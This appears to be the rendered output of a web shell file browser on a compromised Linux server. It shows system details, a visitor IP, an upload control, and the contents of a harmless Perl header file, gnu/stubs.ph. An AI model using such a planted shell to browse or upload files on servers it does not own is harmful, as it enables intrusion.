AlaK4X
Linux lhjmq-records 5.15.0-118-generic #128-Ubuntu SMP Fri Jul 5 09:28:59 UTC 2024 x86_64



Your IP : 3.138.137.244


Current Path : /usr/lib/x86_64-linux-gnu/perl/5.34.0/gnu/
Upload File :
Current File : //usr/lib/x86_64-linux-gnu/perl/5.34.0/gnu/stubs.ph

require '_h2ph_pre.ph';

no warnings qw(redefine misc);

if(!defined (&__x86_64__)) {
    require 'gnu/stubs-32.ph';
}
if(defined (&__x86_64__)  && defined (&__LP64__)) {
    require 'gnu/stubs-64.ph';
}
if(defined (&__x86_64__)  && defined (&__ILP32__)) {
    require 'gnu/stubs-x32.ph';
}
1;